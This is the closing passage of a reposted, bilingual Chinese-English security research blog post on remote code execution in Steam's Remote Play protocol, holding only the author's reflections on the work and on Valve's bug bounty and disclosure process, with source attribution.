就我个人而言,我发现从零开始分析这样的产品并能够逐步解开这么多隐藏的知识,直到你能够做上面列出的所有事情,这是非常令人满意的。
Regarding Valve, I had read many complaints from other security researchers about them being awfully slow to validate reports and all other kinds of terrible experiences, so I didn’t get my hopes too high up when I began submitting my reports.
关于 Valve,我读过很多其他安全研究人员的抱怨,说他们在验证报告和所有其他类型的可怕经历方面非常缓慢,所以当我开始提交报告时,我并没有抱太大的希望。
Although my experience with the reporting and the coordinated vulnerability disclosure was not perfect, I was still pleasantly surprised by how fast some of my reports were treated (the more critical ones) and the bounties paid.
尽管我在报告和协调漏洞披露方面的经验并不完美,但我仍然对我的一些报告(更关键的报告)的处理速度和支付的赏金感到惊喜。
原文始发于THALIUM:Achieving Remote Code Execution in Steam: a journey into the Remote Play protocol
转载请注明:Achieving Remote Code Execution in Steam: a journey into the Remote Play protocol | CTF导航